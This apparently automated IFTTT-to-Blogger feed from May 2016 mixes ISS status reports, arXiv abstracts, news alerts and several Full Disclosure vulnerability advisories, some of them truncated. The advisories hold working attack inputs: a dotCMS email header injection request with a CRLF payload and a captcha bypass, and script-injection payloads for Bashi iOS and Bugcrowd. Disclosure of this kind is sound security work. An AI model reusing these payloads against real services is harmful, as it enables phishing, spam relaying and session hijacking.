PAO Crew Prep for PAO/ r/g 2356 TV Greetings to the Participants of Pressa-2016 Festival r/g 2356 Completed Task List Items WHC KTO R&R Ground Activities All activities were completed unless otherwise noted. BEAM activities SPDM OTCM checkout Nominal ground commanding Three-Day Look Ahead: Thursday, 05/26: BEAM leak check, inflation, deploy, EMCS water pump tube install, Cygnus cargo transfer Friday, 05/27: Vascular Echo ultrasound, Ocular Health, Cygnus cargo transfer Saturday, 05/28: Crew off duty, housekeeping QUICK ISS Status – Environmental Control Group: Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Idle Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up
from ISS On-Orbit Status Report http://ift.tt/20FF9zt
via IFTTT
from ISS On-Orbit Status Report http://ift.tt/20FF9zt
via IFTTT
NGC 5078 and Friends
This sharp telescopic field of view holds two bright galaxies. Barred spiral NGC 5101 (top right) and nearly edge-on system NGC 5078 are separated on the sky by about 0.5 degrees or about the apparent width of a full moon. Found within the boundaries of the serpentine constellation Hydra, both are estimated to be around 90 million light-years away and similar in size to our own large Milky Way galaxy. In fact, if they both lie at the same distance their projected separation would be only 800,000 light-years or so. That's easily less than half the distance between the Milky Way and the Andromeda Galaxy. NGC 5078 is interacting with a smaller companion galaxy, cataloged as IC 879, seen just left of the larger galaxy's bright core. Even more distant background galaxies are scattered around the colorful field. Some are even visible right through the face-on disk of NGC 5101. But the prominent spiky stars are in the foreground, well within our own Milky Way. via NASA http://ift.tt/1WOiTos
[FD] CVE-2016-4803 dotCMS - Email Header Injection
Title: CVE-2016-4803 dotCMS - Email Header Injection Credit: Elar Lang / http://ift.tt/1WV5vQa Vulnerability: Email Header Injection Vulnerable version: before 3.5 / 3.3.2 CVE: CVE-2016-4803 Vendor: dotCMS (http://dotcms.com/) # Description dotCMS has an email sending functionality at path /dotCMS/sendEmail/ Some parameters are vulnerable to Email Header Injection. # Preconditions There is no pre-condition on authentication or on authorization to access this functionality. If captcha is required for the web page, then the only precondition would be captcha. However, captcha is renewed only when you access the captcha image - in other words, you can load it once and manually set the correct value. After this step the "captcha effect" is bypassed. # Proof-of-Concept Proof-of-Concept is made on dotCMS demo site with dotCMS version 3.2.1 on 7th of December 2015. ## Value for subject (%0D%0A is for \r\n): subject=subject%0D%0AX-PoC-of-New-Line%3A+True ## Proof-of-Concept POST request:
POST /dotCMS/sendEmail HTTP/1.1 Host: demo2.dotcms.com ... Cookie: _JSESSIONID=998ADA19C99505E75DC6D27A5E84D...; ... Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 218 from=myemail&to=youremail&subject=subject%0D%0AX-PoC-of-New-Line%3A+True&returnUrl=%2F1&invalidCaptchaReturnUrl=%2F2&useCaptcha=true&captcha=hwxc5&comments=some+content&send=Send ## Received email source: Message-ID: <1894336506.1449476889789.JavaMail.dotcms@democms1.dotcms.net> From: myemail To: youremail Subject: subject X-PoC-of-New-Line: True MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=
Source: Gmail -> IFTTT-> Blogger
Wednesday, May 25, 2016
I have a new follower on Twitter
Kloete Group, Inc.
Executive Search placing quality Leaders w/ proven 8 step Talent Acquisition process & research helping our clients crush their goals & exceed expectations.
Greater Nashville Area
https://t.co/BDc9gurz0F
Following: 1883 - Followers: 2136
May 25, 2016 at 09:54PM via Twitter http://twitter.com/KloeteGroup
Learning Purposeful Behaviour in the Absence of Rewards. (arXiv:1605.07700v1 [cs.LG])
Artificial intelligence is commonly defined as the ability to achieve goals in the world. In the reinforcement learning framework, goals are encoded as reward functions that guide agent behaviour, and the sum of observed rewards provide a notion of progress. However, some domains have no such reward signal, or have a reward signal so sparse as to appear absent. Without reward feedback, agent behaviour is typically random, often dithering aimlessly and lacking intentionality. In this paper we present an algorithm capable of learning purposeful behaviour in the absence of rewards. The algorithm proceeds by constructing temporally extended actions (options), through the identification of purposes that are "just out of reach" of the agent's current behaviour. These purposes establish intrinsic goals for the agent to learn, ultimately resulting in a suite of behaviours that encourage the agent to visit different parts of the state space. Moreover, the approach is particularly suited for settings where rewards are very sparse, and such behaviours can help in the exploration of the environment until reward is observed.
from cs.AI updates on arXiv.org http://ift.tt/1qKphiH
via IFTTT
Yum-me: Personalized Healthy Meal Recommender System. (arXiv:1605.07722v1 [cs.HC])
Many ubiquitous computing projects have addressed health and wellness behaviors such as healthy eating. Healthy meal recommendations have the potential to help individuals prevent or manage conditions such as diabetes and obesity. However, learning people's food preferences and making healthy recommendations that appeal to their palate is challenging. Existing approaches either only learn high-level preferences or require a prolonged learning period. We propose Yum-me, a personalized healthy meal recommender system designed to meet individuals' health goals, dietary restrictions, and fine-grained food preferences. Marrying ideas from user preference learning and healthy eating promotion, Yum-me enables a simple and accurate food preference profiling procedure via an image-based online learning framework, and projects the learned profile into the domain of healthy food options to find ones that will appeal to the user. We present the design and implementation of Yum-me, and further discuss the most critical component of it: FoodDist, a state-of-the-art food image analysis model. We demonstrate FoodDist's superior performance through careful benchmarking, and discuss its applicability across a wide array of dietary applications. We validate the feasibility and effectiveness of Yum-me through a 60-person user study, in which Yum-me improves the recommendation acceptance rate by 42.63% over the traditional food preference survey.
from cs.AI updates on arXiv.org http://ift.tt/1TFeBMP
via IFTTT
Data Programming: Creating Large Training Sets, Quickly. (arXiv:1605.07723v1 [stat.ML])
Large labeled training sets are the critical building blocks of supervised learning methods and are key enablers of deep learning techniques. For some applications, creating labeled training sets is the most time-consuming and expensive part of applying machine learning. We therefore propose a paradigm for the programmatic creation of training sets called data programming in which users provide a set of labeling functions, which are programs that heuristically label large subsets of data points, albeit noisily. By viewing these labeling functions as implicitly describing a generative model for this noise, we show that we can recover the parameters of this model to "denoise" the training set. Then, we show how to modify a discriminative loss function to make it noise-aware. We demonstrate our method over a range of discriminative models including logistic regression and LSTMs. We establish theoretically that we can recover the parameters of these generative models in a handful of settings. Experimentally, on the 2014 TAC-KBP relation extraction challenge, we show that data programming would have obtained a winning score, and also show that applying data programming to an LSTM model leads to a TAC-KBP score almost 6 F1 points over a supervised LSTM baseline (and into second place in the competition). Additionally, in initial user studies we observed that data programming may be an easier way to create machine learning models for non-experts.
from cs.AI updates on arXiv.org http://ift.tt/1NObZwP
via IFTTT
Small Representations of Big Kidney Exchange Graphs. (arXiv:1605.07728v1 [cs.AI])
Kidney exchanges are organized markets where patients swap willing but incompatible donors. In the last decade, kidney exchanges grew from small and regional to large and national---and soon, international. This growth results in more lives saved, but exacerbates the empirical hardness of the $\mathcal{NP}$-complete problem of optimally matching patients to donors. State-of-the-art matching engines use integer programming techniques to clear fielded kidney exchanges, but these methods must be tailored to specific models and objective functions, and may fail to scale to larger exchanges. In this paper, we observe that if the kidney exchange compatibility graph can be encoded by a constant number of patient and donor attributes, the clearing problem is solvable in polynomial time. We give necessary and sufficient conditions for losslessly shrinking the representation of an arbitrary compatibility graph. Then, using real compatibility graphs from the UNOS nationwide kidney exchange, we show how many attributes are needed to encode real compatibility graphs. The experiments show that, indeed, small numbers of attributes suffice.
from cs.AI updates on arXiv.org http://ift.tt/1WUDacF
via IFTTT
Learning Multiagent Communication with Backpropagation. (arXiv:1605.07736v1 [cs.LG])
Many tasks in AI require the collaboration of multiple agents. Typically, the communication protocol between agents is manually specified and not altered during training. In this paper we explore a simple neural model, called CommNN, that uses continuous communication for fully cooperative tasks. The model consists of multiple agents and the communication between them is learned alongside their policy. We apply this model to a diverse set of tasks, demonstrating the ability of the agents to learn to communicate amongst themselves, yielding improved performance over non-communicative agents and baselines. In some cases, it is possible to interpret the language devised by the agents, revealing simple but effective strategies for solving the task at hand.
from cs.AI updates on arXiv.org http://ift.tt/1NObZx1
via IFTTT
Dimension Projection among Languages based on Pseudo-relevant Documents for Query Translation. (arXiv:1605.07844v1 [cs.IR])
Taking advantage of top-ranked documents in response to a query for improving quality of query translation has been shown to be an effective approach for cross-language information retrieval. In this paper, we propose a new method for query translation based on dimension projection of embedded vectors from the pseudo-relevant documents in the source language to their equivalents in the target language. To this end, first we learn low-dimensional representations of the words in the pseudo-relevant collections separately and then aim at finding a query-dependent transformation matrix between the vectors of translation pairs. At the next step, representation of each query term is projected to the target language and then, after using a softmax function, a query-dependent translation model is built. Finally, the model is used for query translation. Our experiments on four CLEF collections in French, Spanish, German, and Persian demonstrate that the proposed method outperforms all competitive baselines in language modelling, particularly when it is combined with a collection-dependent translation model.
from cs.AI updates on arXiv.org http://ift.tt/1TFe8Kp
via IFTTT
Automatic Extraction of Causal Relations from Natural Language Texts: A Comprehensive Survey. (arXiv:1605.07895v1 [cs.AI])
Automatic extraction of cause-effect relationships from natural language texts is a challenging open problem in Artificial Intelligence. Most of the early attempts at its solution used manually constructed linguistic and syntactic rules on small and domain-specific data sets. However, with the advent of big data, the availability of affordable computing power and the recent popularization of machine learning, the paradigm to tackle this problem has slowly shifted. Machines are now expected to learn generic causal extraction rules from labelled data with minimal supervision, in a domain independent-manner. In this paper, we provide a comprehensive survey of causal relation extraction techniques from both paradigms, and analyse their relative strengths and weaknesses, with recommendations for future work.
from cs.AI updates on arXiv.org http://ift.tt/1WUDpo0
via IFTTT
Automatic Open Knowledge Acquisition via Long Short-Term Memory Networks with Feedback Negative Sampling. (arXiv:1605.07918v1 [cs.CL])
Previous studies in Open Information Extraction (Open IE) are mainly based on extraction patterns. They manually define patterns or automatically learn them from a large corpus. However, these approaches are limited when grasping the context of a sentence, and they fail to capture implicit relations. In this paper, we address this problem with the following methods. First, we exploit long short-term memory (LSTM) networks to extract higher-level features along the shortest dependency paths, connecting headwords of relations and arguments. The path-level features from LSTM networks provide useful clues regarding contextual information and the validity of arguments. Second, we constructed samples to train LSTM networks without the need for manual labeling. In particular, feedback negative sampling picks highly negative samples among non-positive samples through a model trained with positive samples. The experimental results show that our approach produces more precise and abundant extractions than state-of-the-art open IE systems. To the best of our knowledge, this is the first work to apply deep learning to Open IE.
from cs.AI updates on arXiv.org http://ift.tt/1TFeAbJ
via IFTTT
Adaptive Neural Compilation. (arXiv:1605.07969v1 [cs.AI])
This paper proposes an adaptive neural-compilation framework to address the problem of efficient program learning. Traditional code optimisation strategies used in compilers are based on applying pre-specified set of transformations that make the code faster to execute without changing its semantics. In contrast, our work involves adapting programs to make them more efficient while considering correctness only on a target input distribution. Our approach is inspired by the recent works on differentiable representations of programs. We show that it is possible to compile programs written in a low-level language to a differentiable representation. We also show how programs in this representation can be optimised to make them efficient on a target distribution of inputs. Experimental results demonstrate that our approach enables learning specifically-tuned algorithms for given data distributions with a high success rate.
from cs.AI updates on arXiv.org http://ift.tt/1NObR0h
via IFTTT
Compliant Conditions for Polynomial Time Approximation of Operator Counts. (arXiv:1605.07989v1 [cs.AI])
In this brief abstract, we develop a computationally simpler version of the operator count heuristic for a particular class of domains. The contribution of this abstract is thus threefold, we (1) propose an efficient closed form approximation to the operator count heuristic; (2) leverage compressed sensing techniques to obtain an integer approximation in polynomial time; and (3) discuss the relationship of the proposed formulation to existing heuristics and investigate properties of domains where such approaches are useful.
from cs.AI updates on arXiv.org http://ift.tt/1WUDmsm
via IFTTT
Toward a general, scaleable framework for Bayesian teaching with applications to topic models. (arXiv:1605.07999v1 [cs.AI])
Machines, not humans, are the world's dominant knowledge accumulators but humans remain the dominant decision makers. Interpreting and disseminating the knowledge accumulated by machines requires expertise, time, and is prone to failure. The problem of how best to convey accumulated knowledge from computers to humans is a critical bottleneck in the broader application of machine learning. We propose an approach based on human teaching where the problem is formalized as selecting a small subset of the data that will, with high probability, lead the human user to the correct inference. This approach, though successful for modeling human learning in simple laboratory experiments, has failed to achieve broader relevance due to challenges in formulating general and scalable algorithms. We propose general-purpose teaching via pseudo-marginal sampling and demonstrate the algorithm by teaching topic models. Simulation results show our sampling-based approach: effectively approximates the probability where ground-truth is possible via enumeration, results in data that are markedly different from those expected by random sampling, and speeds learning especially for small amounts of data. Application to movie synopsis data illustrates differences between teaching and random sampling for teaching distributions and specific topics, and demonstrates gains in scalability and applicability to real-world problems.
from cs.AI updates on arXiv.org http://ift.tt/1NObK56
via IFTTT
Causal inference for cloud computing. (arXiv:1603.01581v2 [cs.AI] UPDATED)
Cloud computing involves complex technical and economical systems and interactions. This brings about various challenges, two of which are: (1) debugging and control of computing systems, based on heterogeneous data, and (2) prediction of performance and price of "spot" resources, allocated via auctions. In this paper, we first establish two theoretical results on approximate causal inference. We then use the first one, approximate counterfactuals, along with established causal methodology, to outline a general framework to address (1). To address (2), we show how the second one, approximate integration of causal knowledge, can in principle provide a tool for cloud clients to trade off privacy against predictability of cloud costs. We report experiments on simulated and real data.
from cs.AI updates on arXiv.org http://ift.tt/1p0WgPt
via IFTTT
One-Shot Generalization in Deep Generative Models. (arXiv:1603.05106v2 [stat.ML] UPDATED)
Humans have an impressive ability to reason about new concepts and experiences from just a single example. In particular, humans have an ability for one-shot generalization: an ability to encounter a new concept, understand its structure, and then be able to generate compelling alternative variations of the concept. We develop machine learning systems with this important capacity by developing new deep generative models, models that combine the representational power of deep learning with the inferential power of Bayesian reasoning. We develop a class of sequential generative models that are built on the principles of feedback and attention. These two characteristics lead to generative models that are among the state-of-the art in density estimation and image generation. We demonstrate the one-shot generalization ability of our models using three tasks: unconditional sampling, generating new exemplars of a given concept, and generating new exemplars of a family of concepts. In all cases our models are able to generate compelling and diverse samples---having seen new examples just once---providing an important class of general-purpose models for one-shot machine learning.
from cs.AI updates on arXiv.org http://ift.tt/1nPBWiT
via IFTTT
COCO: A Platform for Comparing Continuous Optimizers in a Black-Box Setting. (arXiv:1603.08785v2 [cs.AI] UPDATED)
COCO is a platform for Comparing Continuous Optimizers in a black-box setting. It aims at automatizing the tedious and repetitive task of benchmarking numerical optimization algorithms to the greatest possible extent. We present the rationals behind the development of the platform as a general proposition for a guideline towards better benchmarking. We detail underlying fundamental concepts of COCO such as its definition of a problem, the idea of instances, the relevance of target values, and runtime as central performance measure. Finally, we give a quick overview of the basic code structure and the available test suites.
from cs.AI updates on arXiv.org http://ift.tt/1MzUfo5
via IFTTT
COCO: The Bi-objective Black Box Optimization Benchmarking (bbob-biobj) Test Suite. (arXiv:1604.00359v2 [cs.AI] UPDATED)
The bbob-biobj test suite contains 55 bi-objective functions in continuous domain which are derived from combining functions of the well-known single-objective noiseless bbob test suite. Besides giving the actual function definitions and presenting their (known) properties, this documentation also aims at giving the rationale behind our approach in terms of function groups, instances, and potential objective space normalization.
from cs.AI updates on arXiv.org http://ift.tt/1RHmwWP
via IFTTT
Distributed Clustering of Linear Bandits in Peer to Peer Networks. (arXiv:1604.07706v2 [cs.LG] UPDATED)
We provide two distributed confidence ball algorithms for solving linear bandit problems in peer to peer networks with limited communication capabilities. For the first, we assume that all the peers are solving the same linear bandit problem, and prove that our algorithm achieves the optimal asymptotic regret rate of any centralised algorithm that can instantly communicate information between the peers. For the second, we assume that there are clusters of peers solving the same bandit problem within each cluster, and we prove that our algorithm discovers these clusters, while achieving the optimal asymptotic regret rate within each one. Through experiments on several real-world datasets, we demonstrate the performance of proposed algorithms compared to the state-of-the-art.
from cs.AI updates on arXiv.org http://ift.tt/1WoMi7e
via IFTTT
When Anonymous Grading is on, hide Student Name in Gradebook
Although it is tantalizingly close, turning on Canvas Studio: Anonymous Grading ("AG") alone does not guarantee anonymity to students using ...
from Google Alert - anonymous http://ift.tt/1saMa02
via IFTTT
from Google Alert - anonymous http://ift.tt/1saMa02
via IFTTT
Anonymous user cart not clearing - Exposing sensitive user info
Example Scenario: An anonymous user, using a public computer, adds products to cart. They then fill in sensitive user information such as shipping ...
from Google Alert - anonymous http://ift.tt/1UdZg5N
via IFTTT
from Google Alert - anonymous http://ift.tt/1UdZg5N
via IFTTT
Ravens: OL John Urschel tweets that he got straight A's in the four Ph.D. classes he took in his first semester at MIT (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
via IFTTT
Question about OV Anonymous Chip card - North Holland Province Forum
If I buy an empty anonymous chipcard at, say Albert Heine (spelling), is there anyplace in Amsterdam to load the card with a US credit card or cash ...
from Google Alert - anonymous http://ift.tt/1TEm6Um
via IFTTT
from Google Alert - anonymous http://ift.tt/1TEm6Um
via IFTTT
Oregon Veteran Surprised by Anonymous Gift
Seeing the struggling veteran attempting to mow the lawn with a push mower, an anonymous neighbor decided to step up and provide the family ...
from Google Alert - anonymous http://ift.tt/1OX2ITs
via IFTTT
from Google Alert - anonymous http://ift.tt/1OX2ITs
via IFTTT
I have a new follower on Twitter
ComSec
Global Counterespionage Specialists | Cyber TSCM
United States of America
https://t.co/Bf9FOt0RbG
Following: 597 - Followers: 1717
May 25, 2016 at 11:29AM via Twitter http://twitter.com/comsec
Apple hires Encryption Expert to Beef Up Security on its Devices
The FBI and other law enforcement agencies have waged legal war on encryption and privacy technologies. You may have heard many news stories about the legal battle between Apple and the FBI over unlocking an iPhone that belonged to the San Bernardino shooter. However, that was just one battle in a much larger fight. <!-- adsense --> Now, in an effort to make its iPhone surveillance-and-hack
from The Hacker News http://ift.tt/1Tyjfzc
via IFTTT
from The Hacker News http://ift.tt/1Tyjfzc
via IFTTT
ISS Daily Summary Report – 05/24/16
Marrow: Upon waking this morning, the crew took breath and ambient air samples for the Canadian Space Agency (CSA) Marrow experiment which investigates the effect of microgravity on human bone marrow. It is believed that microgravity, like long-duration bed rest on Earth, has a negative effect on bone marrow and the blood cells that are produced in the marrow. The extent of this effect and its recovery are of interest to space research and healthcare providers on Earth. Rodent Research (RR-3) Inventory Audit: The crew continued auditing the remaining RR-3 equipment and supplies. The audit follows the completion of RR-3 operations last week. Ocular Health (OH) Cardiac Operations: The crew began the first of two Ocular Health sessions planned for the week by using a Tonometer on an eye simulator before conducting Tonometry exams. They also performed blood pressure measurements using the Cardiolab (CDL) Holter Arterial Blood Pressure (BP) Unit with guidance from the Ocular Health ground team. Crew members’ bodies change in a variety of ways during space flight, and some experience impaired vision. The Ocular Health investigation gathers data on crew members’ visual health during and after long-duration space station missions. Tests monitor microgravity-induced visual impairment, as well as changes believed to result from elevated intracranial pressure. The investigation will measure how long it takes for crew members to return to normal after they return to Earth. Cardio Ox Ultrasound Operations: With remote guidance from the Cardio Ox ground teams, the crew conducted an ultrasound scan after attaching the Electro Cardiogram (ECG) Electrodes and marking the arteries followed by blood pressure measurements using the Cardiolab Holter Arterial Blood Pressure Unit. The goal of the Cardio Ox investigation is to determine whether biological markers of oxidative and inflammatory stress are elevated during and after space flight and whether this results in an increased, long-term risk of atherosclerosis risk in astronauts. Twelve crewmembers provide blood and urine samples to assess biomarkers before launch, 15 and 60 days after launch, 15 days before returning to Earth, and within days after landing. Ultrasound scans of the carotid and brachial arteries are obtained at the same time points as well as through 5 years after landing as an indicator of cardiovascular health. Micro-Gravity Science Glovebox (MSG) Video Upgrade Equipment (VUE) Setup: The crew upgraded MSG video equipment by replacing the current MSG video drawer with the new High Definition (HD) video drawer before installing two HD video monitors that will be used with the new video drawers. Dose Tracker: The crew completed entries for medication tracking. This investigation documents the medication usage of crew members before and during their missions by capturing data regarding medication use during spaceflight, including side effect qualities, frequencies and severities. The data is expected to either support or counter anecdotal evidence of medication ineffectiveness during flight and unusual side effects experienced during flight. It is also expected that specific, near-real-time questioning about symptom relief and side effects will provide the data required to establish whether spaceflight-associated alterations in pharmacokinetics (PK) or pharmacodynamics (PD) is occurring during missions. Bigelow Expandable Aerospace Module (BEAM) Preparations: The crew removed the Node 3 (N3) Aft Hatch Positive Pressure Relief Valve (PPRV) Sample Port Cap and pressurized N3 to BEAM vestibule to 5psi. An 8-hour leak check is currently in work. The crew also reviewed updates to emergency procedures and key points that were emphasized during BEAM training. In preparation for BEAM viewing, Robotics Ground Controllers walked off the Space Station Remote Manipulator System (SSRMS) to the Lab Power Data Grapple Fixture (PDGF). External robotics: Today, the Space Station Remote Manipulator System (SSRMS) was walked off from Node2 Power Data Grapple Fixture (PDGF) to Lab PDGF, and manuevered to the BEAM viewing position in preparation for BEAM deployment later this week. Cygnus cargo operations: 36 hours and 50 minutes of cargo work have been completed, with an estimate of 8 hours and 20 minutes remaining to complete all Cygnus (OA-6) cargo operations. Today’s Planned Activities All activities were completed unless otherwise noted. MARROW – Air Samples Collection MORZE. Examination using SPRUT-2 device HMS – equipment config before intraocular test COSMOCARD. Closeout ops / r/g 2311 VIZIR. СКПИ battery charge / r/g 2320 HMS – vision test COSMOCARD. Preparing for and Starting 24-hr ECG Recording / r/g 2335 HMS – vision test HMS – vision questionnaire OH – blood pressure measurement EDV (KOV) fill (separation) for ELEKTRON or EDV-SV. Fill from Progress 432 Water Tank r/g 2129 MORZE. Psychophysiological survey: testing, centering, SENSOR HMS – vision questionnaire RR- samples retrieval from MELFI OH – blood pressure measurement Soyuz #720 Samsung Tablets Charging – init HMS Tonometry CMO – assist CARDIOVECTOR. Experiment ops r/g 2333 USND2 – hardware activation HMS Tonometry Test – subject SOZh Maintenance CARDOX – prep ops CARDOX- ultrasonic survey Progress #432 АСН-К deinstall, data download to Laptop r/g 2272 DOSETRK- data download CARDOX-ultrasonic survey – assist RR – Habitat Stow Review RR- hardware inventory GREAT START. Experiment prep / r/g 2322 Health Maintenance System (HMS) Tonometry Test Stow GREAT START. Educational Session and Video Shooting on DUBRAVA Experiment r/g 2322 Checking of Camcorder Setup for Photo/TV CARDOX- blood pressure measurement MORZE. Psychophysiological Survey: Strelau Test USND2- hardware deactivation GREAT START. Concluding Ops / / r/g 2322 VIZIR. Charging СКПИ Infrared Receiver (ИКП) battery – terminate / r/g 2320 COL Ethernet Cable Disconnect Checking Camcorder Setup for Photo/TV MPCC Laptop Power Connect BEAM Deployment OBT MPCC – Р2 Laptop Activation to LAN Network УРАГАН. Observation and Photography Using Photo Hardware r/g 2336 ESA – weekly crew conference Soyuz #720 Samsung Tablets Charging – terminate USOS window shutters closing PAO – crew prep PAO Event Soyuz #719 Samsung Tablet Charging – init MORZE. Psychophysiological Survey: Kettle Test WRM – water balance placeholder Countermeasures System (CMS) Sprint Exercise Optional MSG- hardware stow after video shooting Sync RS Photo Cameras with on-board time / / r/g 1594 ВОЛ Fan Test Activation – noise level control. […]
from ISS On-Orbit Status Report http://ift.tt/247pnOF
via IFTTT
from ISS On-Orbit Status Report http://ift.tt/247pnOF
via IFTTT
Hacker Group Anonymous Targets Governor Rick Scott
Hacker Group Anonymous Targets Governor Rick Scott. CBS Miami. Duration: 01:50 11 hrs ago. SHARE · TWEET · SHARE · EMAIL. CBS Miami's ...
from Google Alert - anonymous http://ift.tt/1YYyPCs
via IFTTT
from Google Alert - anonymous http://ift.tt/1YYyPCs
via IFTTT
[FD] Bashi v1.6 iOS - Persistent Mail Encoding Vulnerability
Document Title: =============== Bashi v1.6 iOS - Persistent Mail Encoding Vulnerability References (Source): ==================== http://ift.tt/1WSlKgZ Release Date: ============= 2016-05-25 Vulnerability Laboratory ID (VL-ID): ==================================== 1852 Common Vulnerability Scoring System: ==================================== 3.4 Product & Service Introduction: =============================== This is an ios bash4.3 app,you can learn,run,share bash 4.3 script. Code templates,the contents of the new file is copy from contents of the template file. In(the built-in browser or the txt editor),Select the text to run. Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered an application-side mail encoding web vulnerability in the official Bashi v1.6 iOS mobile application. Vulnerability Disclosure Timeline: ================================== 2016-05-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== XiaoWen Huang Product: Bashi - iOS Mobile Application 1.6 Exploitation Technique: ======================= Local Severity Level: =============== Medium Technical Details & Description: ================================ An application-side input validation web vulnerability has been discovered in the official Bashi v1.6 iOS mobile application. The security web vulnerability allows to inject malicious script codes on the application-side of the vulnerable iOS mobile app. The vulnerability is located in the encode mechanism of the `code console` input field. Local attackers with restricted or local low privileged application user accounts are able to inject own malicious script codes to the code console input. Thus code can be send by the share function to the author or random emails. The execution of the malicious script code occurs in the mail body message context on sharing by email. The injection point of the vulnerability is the code console compiler input field. The attack vector of the issue is persistent on the application-side and the request method to inject is a basic device sync. The security risk of the application-side vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the persistent web vulnerability requires a low privileged ios device account with restricted access and low user interaction. Successful exploitation of the vulnerabilities results in persistent phishing mails, session hijacking, persistent external redirect to malicious sources and application-side manipulation of affected or connected module context. Vulnerable Module(s) [+] Code Console Vulnerable Input(s): [+] Code Template Vulnerable Parameter(s) [+] code Affected Module(s) [+] Mail Message Body (Share Function) Proof of Concept (PoC): ======================= The application-side validation web vulnerability can be exploited by remote attackers with low privileged iOS device user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Install the vulnerable iOS app to your apple device 2. Start the app 3. Click the code module to open the compiler 4. Inject a script code payload to the "$Person" variable in the code-line input field 5. Now, click above the share button and choose send by email Note: The payload is getting saved to the mail body message context 6. The execution occurs directly in the mail body of the email context were the code becomes via echo visible 7. Successful reproduce of the vulnerability! PoC: Code Template - Share
Source: Gmail -> IFTTT-> Blogger
#Note:The template file will be copied to a new file. When you change the code of the template file you can create new file with& nbsp;this base code.
echo
Source: Gmail -> IFTTT-> Blogger
[FD] Bugcrowd Bug Bounty #7 - Persistent Web Vulnerability
Document Title: =============== Bugcrowd Bug Bounty #7 - Persistent Web Vulnerability References (Source): ==================== http://ift.tt/1Wmvfob ID: b40f63ed19074014df808599e44684f6a18bb6f4f51cf21948ef78df2f56c13b Release Date: ============= 2016-05-10 Vulnerability Laboratory ID (VL-ID): ==================================== 1830 Common Vulnerability Scoring System: ==================================== 3.8 Product & Service Introduction: =============================== From the outback to the valley, Bugcrowd is paving the way for crowdsourced security. Founded in 2012 in Australia by Casey Ellis, Bugcrowd is now based in San Francisco and is backed by Costanoa Venture Capital, Rally Ventures, Paladin Capital Group and Blackbird Ventures. (Copy of the Homepage: http://ift.tt/1OVZRKx ) Abstract Advisory Information: ============================== The vulnerability laboratory research team discovered an application-side vulnerability in the official Bugcrowd online service web-application. Vulnerability Disclosure Timeline: ================================== 2016-04-20: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2016-04-21: Vendor Notification (Bugcrowd - Bug Bounty Program) 2016-**-**: Vendor Fix/Patch (Bugcrowd - Bug Bounty Program) 2016-05-03: Acknowledgement & Bug Bounty (Bugcrowd - Bug Bounty Program) 2016-05-10: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Bugcrowd Product: Online Service - Web Application 2016 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A persistent script code injection and application-side mail encode web vulnerability has been discovered in the official Bugcrowd online service web-application. The vulnerability typ allows an attacker to inject own malicious script code to the application-side of the vulnerable service function or web modules context. The bugcrowd service allows to register by a web formular in the webpage to receive new information like "... Bugcrowd`s Next Chapter". In the name values attackers are able to inject malicious script codes. In an advisory send to bugcrowd about 1 year ago we already mentioned the problem but your team was not able to verify the bug finally. Thus time we exploited the bug by using casey ellis wrong encoded context of the bugcrowd registered users to stream the code with the service emails. The injection point is the formular registration for receiving information of bugcrowd and the execution point is the email body context with the broken encode values. The code directly executes after the arrival in the main body context and the sender of the email was the mail support@bugcrowd inbox. The security risk of the application-side cross site web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.7. Exploitation of the persistent input validation web vulnerability requires a low privileged web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules. Request Method(s): [+] POST Vulnerable Parameter(s): [+] Firstname [+] Lastname [+] Companyname Affected Module(s): [+] Email Community Letter - (community@bugcrowd.com) Proof of Concept (PoC): ======================= The security vulnerability can be exploited by remote attackers without user interaction or privileged web-application user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Email: We've raised money, here's what's next from Bugcrowd (community@bugcrowd.com) - Casey Ellis
Hi "><[PERSISTENT INJECTED SCRIPT CODE EXECUTION!]")" <="" "=""><iframe src=a onload=alert("PENTEST") <,</p> <p style="margin-bottom: 1em; -webkit-text-size-adjust:100%; -ms-text-size-adjust:100%">As you may have&nbsp;already heard, this morning we <a href="http://ift.tt/1TDBMXY" style="-webkit-text-size-adjust:100%; -ms-text-size-adjust:100%" data-hs-link-id="0">announced our $15M Series B funding</a>. We're proud to have many of our previous investors joining us again, as well as pleased to welcome new investors to the family. <br><br>We couldn't have done this without you. With your help we've built a massive&nbsp;community of hackers, made up of diverse and talented folks from all over the world.<br><br>We've got lots of plans for what's next and I've shared those details on our blog. Please check it out to learn more.<br><br><strong><a href="http://ift.tt/1OW0AeP" style="-webkit-text-size-adjust:100%; -ms-text-size-adjust:100%" data-hs-link-id="1">Read about our plans for Bugcrowd's next chapter</a>.</strong> </p><p style="margin-bottom: 1em; -webkit-text-size-adjust:100%; -ms-text-size-adjust:100%">Thank you joining us on this journey. There's so much more to come! We hope you'll <a href="https://twitter.com/Bugcrowd/status/722904657366884353" style="-webkit-text-size-adjust:100%; -ms-text-size-adjust:100%" data-hs-link-id="0">join us today in our celebration</a> of this Bugcrowd community milestone.</p> <p style="margin-bottom: 1em; -webkit-text-size-adjust:100%; -ms-text-size-adjust:100%">Sincerely,</p> <p style="margin-bottom: 1em; -webkit-text-size-adjust:100%; -ms-text-size-adjust:100%">Casey Ellis<br>Bugcrowd Founder &amp; CEO</p></div> Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure 